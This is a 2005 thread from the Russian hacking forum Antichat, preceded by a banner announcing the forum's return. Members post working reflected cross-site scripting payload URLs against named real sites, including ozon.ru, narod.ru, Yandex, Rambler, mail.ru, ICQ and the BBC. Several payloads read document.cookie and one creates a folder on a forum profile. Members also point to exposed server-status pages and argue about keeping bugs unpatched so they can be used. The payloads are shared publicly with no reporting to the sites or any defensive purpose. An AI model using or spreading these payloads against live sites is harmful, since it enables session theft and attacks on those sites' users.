Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
XSS на narod.ru & ozon.ru |
13.11.2005, 02:15
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226
Репутация:
1332
|
|
XSS на narod.ru & ozon.ru
сёдня нашёл хсс у народа и озона
http://zaco.jino-net.ru
------
Код:
http://www.ozon.ru/context/mcode_list/id/12/?sort=bests&from=xaxa"><script>alert('XAXA')</script><a="
Код:
http://narod.yandex.ru/rubrics/top100.xhtml?sort=xaxa><script>alert('XAXA')</script><a%20a=&c=2xaxa
------
оффтоп: в чате k1b0rg сказал что нашёл много багов у извесных ресурсов, но сообщил что не будет вышладывать в общаг, я с этим не согласен поэтому нашёл сам и в паблик.
Народ должен знать!))
Последний раз редактировалось PinkPanther; 13.11.2005 в 02:23..
Причина: небыло скриптов
|
|
|
13.11.2005, 02:20
|
|
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355
Репутация:
241
|
|
Сообщение от ZaCo
сёдня нашёл хсс у народа и озона
http://zaco.jino-net.ru
------
оффтоп: в чате k1b0rg сказал что нашёл много багов у извесных ресурсов, но сообщил что не будет вышладывать в общаг, я с этим не согласен поэтому нашёл сам и в паблик.
Народ должен знать!)) Впреть, выкладывай не ссылку на свой сайт, а сами скрипты(свриптовые сплойты).!!!
|
|
|
|
13.11.2005, 09:18
|
|
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме:
484586
Репутация:
16
|
|
Работает. Только про эту багу помоему гдето здесь уже и писали =))))
Последний раз редактировалось k00p3r; 13.11.2005 в 13:17..
|
|
|
|
13.11.2005, 12:07
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
оффтоп: в чате k1b0rg сказал что нашёл много багов у извесных ресурсов, но сообщил что не будет вышладывать в общаг, я с этим не согласен поэтому нашёл сам и в паблик.
Народ должен знать!))
раз не согласен, то ищи сам и выкладывай, а я хочу чтобы еще пожили уязвимости, если кому-то надо будет, чтобы воспользовался бы, и чтобы не боялся что из-за какого-то дебила эту багу прикроют.
Но я выложу, вопрос тока времени.
Я сам за свободу инфы, но все таки сущ. люди, которую эту свободу обращают во зло, я постараюсь чтобы этого не было.
|
|
|
|
13.11.2005, 12:44
|
|
Banned
Регистрация: 06.10.2005
Сообщений: 180
Провел на форуме:
244618
Репутация:
-4
|
|
Модлодец ZaCo
|
|
|
|
13.11.2005, 17:17
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131
Репутация:
47
|
|
Вот еще одна. Жалко её не поюзаешь.
http://www.narod.ru/guestbook/?owner=1&mainhtml=gb.txt&messageshtml=%3Cscript%3E alert('x')%3C/script%3E
|
|
|
|
13.11.2005, 20:24
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
http://search.rambler.ru/cgi-bin/advanced.cgi?set=0"><script>alert(/testing_by_censored!/)</script>
http://talk.mail.ru/login.html?target=0"><script>alert(/testing_by_censored!/)</script>
http://www.ganjawars.ru/trade-terminal.php?object_id=13925&resource=123321><scri pt>alert(/testing_by_censored!/)</script>
http://www.august4u.ru/gb/?id=><script>alert(/tested_by_censored!/)</script>&gb=&page=1234567
http://ww2.tymoshenko.com.ua/rus/sub...=&USER_SUB_FOR
M%5Buser_email%5D=%3Cscript%3Ealert%28123%29%3C%2F script%3E&go=%C4%E0%EB%B3+%3E%3E+
http://www.forsakenworld.ru/cgi/register.cgi?action=<script>alert(/testing_by_censored!/)</script>
http://www.xakep.ru/post/26703/default.asp?print=12345"></iframe><script>alert(/testing_by_censored!/)</script>
В профиле создаст новую XSS-папку:
http://forum.xakep.ru/profile/manfolders.asp?mode=create&foldername=<script>aler t(/testing_by_censored!/)</script>&x=53&y=14
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
|
|
|
|
13.11.2005, 20:55
|
|
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607
Репутация:
454
|
|
RAMBLER.RU:
http://smi.rambler.ru/main.cgi?action=<script>alert(document.cookie)</script>
http://finance.rambler.ru/db/chain.html?type=fix&chain_id=<script>alert(documen t.cookie)</script>
http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words="><script>alert(document.cookie) </script>&ftype=5&form=0&hu=1&what=0
ICQ.COM:
http://www.icq.com/boards/atoz.php?letter=</title><script>alert(document.cookie)</script><title>
YANDEX.RU:
http://news.yandex.ru/yandsearch?cl4url=www.utro.ru/news/2005/11/12/494551.shtml&country=Russia&cat="><script>alert(do cument.cookie)</script>
тоже интересно:
http://info.rambler.ru/server-status
http://info.rambler.ru:8100/server-status
Последний раз редактировалось VectorG; 13.11.2005 в 20:58..
|
|
|
|
13.11.2005, 22:26
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226
Репутация:
1332
|
|
2k1b0rg : во-первых я сам и нашёл. во-вторых - это хсс, думаю если бы я нашёл к примеру инклуд в яндексе=) то об этом я сразу бы не сообщал)) я клоню к тому что скрывать от посторонних глаз хсс глупо - тк такие баги находятся сразу и не представляют особой ценности+) я инашёл за 5 минут глупо имхо
2k00p3r хз сам не видел раньше
---
http://cards.yandex.ru/theme.xhtml?st=Family&topic=Husb-and-Wives&series=xaxa"><script>alert('XAXA')</script><a%20s="
---
http://www.bbc.co.uk/cgi-bin/education/betsie/parser.pl/0005/<script%20src=javascript :alert('XAXA') - на bbc.com все ссылки вели именно на bbc.co.uk
---
http://www.bbc.co.uk/cgi-perl/weather/search/new_search.pl?search_query=xaxa<script>alert('XAXA ')</script>
---
Последний раз редактировалось ZaCo; 13.11.2005 в 23:21..
|
|
|
|
13.11.2005, 23:34
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131
Репутация:
47
|
|
2censored, VectorG, ZaCo
ЭЭэ, хватит...  )) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
